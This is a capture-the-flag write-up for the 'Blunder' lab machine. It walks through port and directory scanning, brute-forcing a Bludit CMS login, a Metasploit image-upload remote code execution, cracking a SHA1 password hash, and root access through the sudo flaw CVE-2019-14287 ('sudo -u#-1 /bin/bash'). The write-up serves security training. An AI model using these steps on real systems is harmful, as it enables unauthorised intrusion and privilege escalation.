Blunder Write-Up
Contents
Intro
Simple MSF, CMS enumeration and a sudo underflow exploit... Let's go!
Foothold
root@kali:~# nmap -sV -sC 10.10.10.191 PORT STATE SERVICE VERSION 21/tcp closed ftp 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-generator: Blunder |_http-server-header: Apache/2.4.41 (Ubuntu) |_http-title: Blunder | A blunder of interesting facts
Since FTP is closed we can take a look at the website runnning on port 80:
Looking around it seems like a very plain looking blog, when you see a blog styled site you can normally assume it's using a CMS. The fastest way to identify a CMS is to find the login page, however sometimes checking web console or just inspecting page html is good enough. In this case, 'View Source' and 'Developer Console' had no clues so it's onto directory bruteforcing:
root@kali:~# gobuster dir -w /usr/share/wordlists/dirb/common.txt -u http://10.10.10.191 =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://10.10.10.191 [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirb/common.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Timeout: 10s =============================================================== 2020/10/11 14:45:54 Starting gobuster =============================================================== /.hta (Status: 403) /.htaccess (Status: 403) /.htpasswd (Status: 403) /0 (Status: 200) /about (Status: 200) /todo.txt (Status: 200) /admin (Status: 301) /cgi-bin/ (Status: 301)
The first response from Gobuster to stand out is /admin so we'll take a look:
'Bludit' after a quick search appears to be a "Flat-File" CMS for blogs and general websites. My first step for CMS exploitation is checking for default creds. Bludit's default login creds are Admin:Administrator. Default creds sadly didn't work, looking at the documentation: "for security reasons it's suggested that you disable this account". If we can find a username we can try a bruteforce. Let's go back to the Gobuster output and take a look at /todo.txt:
-Update the CMS -Turn off FTP - DONE -Remove old users - DONE -Inform fergus that the new blog needs images - PENDING
From this we can assume fergus is a user. Assuming this is a user, we can attempt to bruteforce the account. A little more digging on Bludit and I found this script for bruteforcing the password. We can build a personalized word list with Cewl: cewl -w wordlist.txt -d 10 -m 7 http://10.10.10.191. Editing the script to use this wordlist and pointing to the correct host we can run it. Here is the output I got:
SUCCESS: Password found! Use fergus:RolandDeschain to login
We're in! Time to look for an exploit to get us into the box. Looking around there doesn't seem to be any obvious file upload so since this is an easy box we can check Metasploit and Searchsploit first.
root@kali:~# msfconsole + -- --=[ 1947 exploits - 1089 auxiliary - 333 post ] + -- --=[ 556 payloads - 45 encoders - 10 nops ] + -- --=[ 7 evasion ] msf5 > search bludit Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/linux/http/bludit_upload_images_exec 2019-09-07 excellent Yes Bludit Directory Traversal Image File Upload Vulnerability msf5 >
We can assume this is the right exploit as /todo.txt referenced that a new blog needed images, and this is an image upload exploit. I've bolded the options that need to be set:
msf5 exploit(linux/http/bludit_upload_images_exec) > show options Module options (exploit/linux/http/bludit_upload_images_exec): Name Current Setting Required Description ---- --------------- -------- ----------- BLUDITPASS yes The password for Bludit BLUDITUSER yes The username for Bludit Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS yes The target host RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI / yes The base path for Bludit VHOST no HTTP server virtual host Exploit target: Id Name -- ---- 0 Bludit v3.9.2
User
Once run we have a Meterpreter shell, run shell and we now have a standard bash shell. Finally let's run bash -i to enable interactive mode so we can see our working directory and we're good to start our initial enumeration.
www-data@blunder:/var/www/bludit-3.9.2/bl-content/tmp$
We're currently in bludit's directory within /www i want to go and check the home folders but instead of going straight there I manually step back with cd .. just in case we spot any useful information as we step backwards though the directory structure. As we're stepping back i see something very interesting:
www-data@blunder:/var/www$ ls -al drwxr-xr-x 5 root root 4096 Nov 28 2019 . drwxr-xr-x 15 root root 4096 Nov 27 2019 .. drwxr-xr-x 8 www-data www-data 4096 May 19 15:13 bludit-3.10.0a drwxrwxr-x 8 www-data www-data 4096 Apr 28 12:18 bludit-3.9.2 drwxr-xr-x 2 root root 4096 Nov 28 2019 html
Looking back on the Metasploit options we see this: Bludit v3.9.2 and yet we see bludit-3.10.0a. We'll check back here later. Let's look in the home folder:
www-data@blunder:/home$ ls -al drwxr-xr-x 4 root root 4096 Apr 27 14:31 . drwxr-xr-x 21 root root 4096 Apr 27 14:09 .. drwxr-xr-x 16 hugo hugo 4096 May 26 09:29 hugo drwxr-xr-x 16 shaun shaun 4096 Apr 28 12:13 shaun
Both users don't have anything in their folders, user.txt is only in /hugo so he's the target, let's check back in the /bludit-3.10.0a:
www-data@blunder:/var/www/bludit-3.10.0a/bl-content/databases$
Well... /bl-content/databases might have some creds we can try:
www-data@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ cat users.php
{
"admin": {
"nickname": "Hugo",
"firstName": "Hugo",
"lastName": "",
"role": "User",
"password": "faca404fd5c0a31cf1897b823c695c85cffeb98d",
"email": "",
"registered": "2019-11-27 07:40:55",
"tokenRemember": "",
"tokenAuth": "b380cb62057e9da47afce66b4615107d",
"tokenAuthTTL": "2009-03-15 14:00",
"twitter": "",
"facebook": "",
"instagram": "",
"codepen": "",
"linkedin": "",
"github": "",
"gitlab": ""
}
}
The password seems to be hashed, running it though Hash-identifier reveals it's SHA1. We can now use one of the thousands of online hash decryption sites to reverse it: Password120. Time to swap user and grab the user flag:
www-data@blunder:/$ su hugo Password: Password120 hugo@blunder:/$
Root
Now it's time for root. I usually start with a sudo -l but sadly sudo: no tty present so let's upgrade to a full TTY shell using a Python one liner: python -c 'import pty; pty.spawn("/bin/sh")'
hugo@blunder:/$ sudo -l Matching Defaults entries for hugo on blunder: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User hugo may run the following commands on blunder: (ALL, !root) /bin/bash
Hugo can execute /bin/bash as all users excluding root? This is a little uncommon and reminded me of a vulnerability found back in 2019 (17/10/2019). CVE-2019-14287 is a sudo vulnerability where by specifying the user by their UID (and not ther username) can cause a bug when the value is parsed to setuserid. If you parse a UID of -1 (or it's unsigned equivalent 4294967295) the function will return a 0. Whos user ID is 0? Root! Simply using this command: sudo -u#-1 /bin/bash will get you running bash as root instantly!
root@blunder:~# whoami && id root uid=0(root) gid=0(root) groups=0(root)
There we go! User & Root! Thanks for reading and hope this helps!